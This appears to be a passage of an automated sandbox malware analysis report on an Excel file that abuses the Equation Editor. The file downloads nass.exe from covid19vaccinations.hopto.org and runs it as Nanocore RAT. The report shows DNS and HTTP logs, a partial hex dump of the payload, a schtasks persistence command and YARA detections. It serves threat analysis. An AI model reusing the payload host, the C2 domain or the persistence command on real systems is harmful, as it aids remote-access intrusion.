                                                          Apr 12, 2021 11:33:22.508759022 CEST192.168.2.228.8.8.80x78ddStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:22.566920996 CEST192.168.2.228.8.8.80x78ddStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:22.653704882 CEST192.168.2.228.8.4.40x583Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:22.733686924 CEST192.168.2.228.8.8.80x9876Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:22.783457994 CEST192.168.2.228.8.8.80x9876Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:26.876676083 CEST192.168.2.228.8.8.80xedecStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:26.971744061 CEST192.168.2.228.8.4.40xd57eStandard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:27.116089106 CEST192.168.2.228.8.8.80x7f12Standard query (0)nassiru1155.ddns.netA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Apr 12, 2021 11:31:50.577615976 CEST8.8.8.8192.168.2.220x1dffNo error (0)covid19vaccinations.hopto.org13.235.115.155A (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:31:50.636962891 CEST8.8.8.8192.168.2.220x1dffNo error (0)covid19vaccinations.hopto.org13.235.115.155A (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:20.342282057 CEST8.8.8.8192.168.2.220xc76fName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:20.401803017 CEST8.8.8.8192.168.2.220xc76fName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:20.494453907 CEST8.8.4.4192.168.2.220xf04eName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:20.571389914 CEST8.8.8.8192.168.2.220xa4faName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:20.633337975 CEST8.8.8.8192.168.2.220xa4faName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:24.761466980 CEST8.8.8.8192.168.2.220x28e8Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:24.880559921 CEST8.8.4.4192.168.2.220xe8b4Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:24.995810986 CEST8.8.8.8192.168.2.220x1011Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.097924948 CEST8.8.8.8192.168.2.220xfa7dName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.159094095 CEST8.8.8.8192.168.2.220xfa7dName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.218151093 CEST8.8.8.8192.168.2.220xfa7dName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.303083897 CEST8.8.4.4192.168.2.220x2834Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.363369942 CEST8.8.4.4192.168.2.220x2834Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:29.514780045 CEST8.8.8.8192.168.2.220xb7a4Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:49.376719952 CEST8.8.8.8192.168.2.220xe026Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:49.480118036 CEST8.8.4.4192.168.2.220x45b8Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:49.576049089 CEST8.8.8.8192.168.2.220x9831Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:53.672323942 CEST8.8.8.8192.168.2.220xae36Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:53.721529961 CEST8.8.8.8192.168.2.220xae36Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:53.822905064 CEST8.8.4.4192.168.2.220xb0bcName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:53.888621092 CEST8.8.8.8192.168.2.220xaddbName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:53.945800066 CEST8.8.8.8192.168.2.220xaddbName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:58.032391071 CEST8.8.8.8192.168.2.220x167aName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:58.090007067 CEST8.8.8.8192.168.2.220x167aName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:58.217211962 CEST8.8.4.4192.168.2.220x2987Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:58.284317970 CEST8.8.8.8192.168.2.220x248dName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:32:58.333916903 CEST8.8.8.8192.168.2.220x248dName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:18.241116047 CEST8.8.8.8192.168.2.220xba10Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:18.370712042 CEST8.8.4.4192.168.2.220x4072Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:18.474462032 CEST8.8.8.8192.168.2.220xf297Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:22.566188097 CEST8.8.8.8192.168.2.220x78ddName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:22.615648031 CEST8.8.8.8192.168.2.220x78ddName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:22.704150915 CEST8.8.4.4192.168.2.220x583Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:22.782644987 CEST8.8.8.8192.168.2.220x9876Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:22.841954947 CEST8.8.8.8192.168.2.220x9876Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:26.925582886 CEST8.8.8.8192.168.2.220xedecName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:27.033773899 CEST8.8.4.4192.168.2.220xd57eName error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)
                                                          Apr 12, 2021 11:33:27.165102959 CEST8.8.8.8192.168.2.220x7f12Name error (3)nassiru1155.ddns.netnonenoneA (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • covid19vaccinations.hopto.org

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.224916713.235.115.15580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Apr 12, 2021 11:31:50.816945076 CEST0OUTGET /nass.exe HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                          Host: covid19vaccinations.hopto.org
                                                          Connection: Keep-Alive
                                                          Apr 12, 2021 11:31:50.978774071 CEST2INHTTP/1.1 200 OK
                                                          Date: Mon, 12 Apr 2021 09:31:52 GMT
                                                          Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16
                                                          Last-Modified: Mon, 12 Apr 2021 07:38:49 GMT
                                                          ETag: "c1600-5bfc19ac18ac0"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 792064
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-msdownload
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 09 f9 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 a8 08 00 00 6c 03 00 00 00 00 00 6a c7 08 00 00 20 00 00 00 e0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c7 08 00 4f 00 00 00 00 e0 08 00 34 69 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 a7 08 00 00 20 00 00 00 a8 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 34 69 03 00 00 e0 08 00 00 6a 03 00 00 aa 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0c 00 00 02 00 00 00 14 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c c7 08 00 00 00 00 00 48 00 00 00 02 00 05 00 ac de 00 00 cc d9 00 00 03 00 00 00 01 00 00 06 78 b8 01 00 a0 0e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 23 00 00 0a 28 24 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 25 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 02 17 28 28 00 00 0a 00 02 17 28 29 00 00 0a 00 02 16 28 2a 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 18 02 00 06 28 2b 00 00 0a 00 2a 26 00 02 28 2c 00 00 0a 00 2a ce 73 2d 00 00 0a 80 01 00 00 04 73 2e 00 00 0a 80 02 00 00 04 73 2f 00 00 0a 80 03 00 00 04 73 30 00 00 0a 80 04 00 00 04 73 31 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 33 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 34 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 35 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 36 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 37 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 38 00 00 0a 6f 39 00 00 0a 73 3a 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELs`Plj @ @O4i` H.text `.rsrc4ij@@.reloc`@BLHx0(#($(o%*(&('((()(**N(o(+*&(,*s-s.s/s0s1*0~o2+*0~o3+*0~o4+*0~o5+*0~o6+*0<~(7,!rp(8o9s:~+*0~


                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Start time:11:30:47
                                                          Start date:12/04/2021
                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                          Imagebase:0x13fd50000
                                                          File size:27641504 bytes
                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:11:31:09
                                                          Start date:12/04/2021
                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                          Imagebase:0x400000
                                                          File size:543304 bytes
                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:11:31:12
                                                          Start date:12/04/2021
                                                          Path:C:\Users\Public\vbc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                          Imagebase:0x12c0000
                                                          File size:792064 bytes
                                                          MD5 hash:6A647FD057FD6A0B85C644D928125EB4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 19%, ReversingLabs
                                                          Reputation:low

                                                          General

                                                          Start time:11:31:14
                                                          Start date:12/04/2021
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\blFUun' /XML 'C:\Users\user\AppData\Local\Temp\tmpE206.tmp'
                                                          Imagebase:0x150000
                                                          File size:179712 bytes
                                                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:11:31:16
                                                          Start date:12/04/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          Imagebase:0xdc0000
                                                          File size:32768 bytes
                                                          MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2370244781.0000000000D00000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2370244781.0000000000D00000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2370794437.00000000034E6000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2370794437.00000000034E6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2369932100.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2369932100.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2369932100.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2370250131.0000000000D10000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2370250131.0000000000D10000.00000004.00000001.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2370250131.0000000000D10000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:moderate

                                                          General

                                                          Start time:11:31:33
                                                          Start date:12/04/2021
                                                          Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
                                                          Imagebase:0x260000
                                                          File size:32768 bytes
                                                          MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Antivirus matches:
                                                          • Detection: 0%, Metadefender, Browse
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:moderate

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >